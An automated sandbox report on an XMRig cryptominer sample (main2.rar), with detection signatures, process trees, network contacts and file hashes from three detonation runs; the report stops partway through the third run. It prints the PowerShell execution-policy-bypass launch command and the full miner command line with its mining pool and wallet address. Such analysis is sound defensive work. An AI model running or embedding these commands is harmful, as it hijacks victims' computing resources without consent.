Malware Analysis Report

2025-04-19 18:41

Sample ID 240526-qtzx2shb26
Target main2.rar
SHA256 08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b
Tags
xmrig execution miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral32

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral31

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b

Threat Level: Known bad

The file main2.rar was found to be: Known bad.

Malicious Activity Summary

xmrig execution miner

xmrig

XMRig Miner payload

Blocklisted process makes network request

Executes dropped EXE

Command and Scripting Interpreter: PowerShell

Suspicious use of WriteProcessMemory

Suspicious behavior: LoadsDriver

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-26 13:33

Signatures

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:21

Platform

win11-20240426-en

Max time kernel

1798s

Max time network

1761s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 52.111.227.11:443 tcp

Files

memory/4160-0-0x00007FFA68473000-0x00007FFA68475000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_adka1anw.l5o.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4160-9-0x000002C0205D0000-0x000002C0205F2000-memory.dmp

memory/4160-10-0x00007FFA68470000-0x00007FFA68F32000-memory.dmp

memory/4160-11-0x00007FFA68470000-0x00007FFA68F32000-memory.dmp

memory/4160-12-0x00007FFA68470000-0x00007FFA68F32000-memory.dmp

memory/4160-14-0x000002C039040000-0x000002C039052000-memory.dmp

memory/4160-15-0x000002C038BD0000-0x000002C038BDA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2108-46-0x000001FA4E660000-0x000001FA4E680000-memory.dmp

memory/2108-47-0x000001FA4E8B0000-0x000001FA4E8D0000-memory.dmp

memory/4160-49-0x00007FFA68473000-0x00007FFA68475000-memory.dmp

memory/2108-48-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/4160-50-0x00007FFA68470000-0x00007FFA68F32000-memory.dmp

memory/2108-52-0x000001FA4E8F0000-0x000001FA4E910000-memory.dmp

memory/2108-51-0x000001FA4E8D0000-0x000001FA4E8F0000-memory.dmp

memory/2108-53-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/4160-54-0x00007FFA68470000-0x00007FFA68F32000-memory.dmp

memory/2108-55-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-56-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-57-0x000001FA4E8D0000-0x000001FA4E8F0000-memory.dmp

memory/2108-58-0x000001FA4E8F0000-0x000001FA4E910000-memory.dmp

memory/2108-59-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-60-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-61-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-62-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-63-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-64-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-65-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-66-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-67-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-68-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-69-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-70-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-71-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-72-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-73-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-74-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-75-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-76-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-77-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-78-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-79-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-80-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-81-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-82-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-83-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-84-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-85-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-86-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-87-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-88-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-89-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-90-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-91-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-92-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-93-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-94-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-95-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-96-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-97-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-98-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-99-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-100-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-101-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-102-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-103-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-104-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-105-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-106-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-107-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-108-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-109-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-110-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-111-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-112-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-113-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-114-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-115-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-116-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

memory/2108-117-0x00007FF67A3D0000-0x00007FF67B003000-memory.dmp

Analysis: behavioral32

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:54

Platform

win11-20240426-en

Max time kernel

1798s

Max time network

1773s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/3240-0-0x00007FFB21613000-0x00007FFB21615000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f2zc2zds.i3d.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3240-9-0x000002B8385C0000-0x000002B8385E2000-memory.dmp

memory/3240-10-0x00007FFB21610000-0x00007FFB220D2000-memory.dmp

memory/3240-11-0x00007FFB21610000-0x00007FFB220D2000-memory.dmp

memory/3240-12-0x00007FFB21610000-0x00007FFB220D2000-memory.dmp

memory/3240-14-0x000002B838AD0000-0x000002B838AE2000-memory.dmp

memory/3240-15-0x000002B838AC0000-0x000002B838ACA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1792-46-0x000001F89E990000-0x000001F89E9B0000-memory.dmp

memory/1792-47-0x000001F8A0290000-0x000001F8A02B0000-memory.dmp

memory/1792-48-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/3240-49-0x00007FFB21613000-0x00007FFB21615000-memory.dmp

memory/1792-52-0x000001F932E80000-0x000001F932EA0000-memory.dmp

memory/1792-51-0x000001F8A02B0000-0x000001F8A02D0000-memory.dmp

memory/3240-50-0x00007FFB21610000-0x00007FFB220D2000-memory.dmp

memory/1792-53-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-54-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-57-0x000001F932E80000-0x000001F932EA0000-memory.dmp

memory/1792-56-0x000001F8A02B0000-0x000001F8A02D0000-memory.dmp

memory/1792-55-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-58-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-59-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-60-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-61-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-62-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-63-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-64-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-65-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-66-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-67-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-68-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-69-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-70-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-71-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-72-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-73-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-74-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-75-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-76-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-77-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-78-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-79-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-80-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-81-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-82-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-83-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-84-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-85-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-86-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-87-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-88-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-89-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-90-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-91-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-92-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-93-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-94-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-95-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-96-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-97-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-98-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-99-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-100-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-101-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-102-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-103-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-104-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-105-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-106-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-107-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-108-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-109-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-110-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-111-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-112-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-113-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-114-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-115-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

memory/1792-116-0x00007FF62EFF0000-0x00007FF62FC23000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:21

Platform

win10-20240404-en

Max time kernel

1791s

Max time network

1770s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

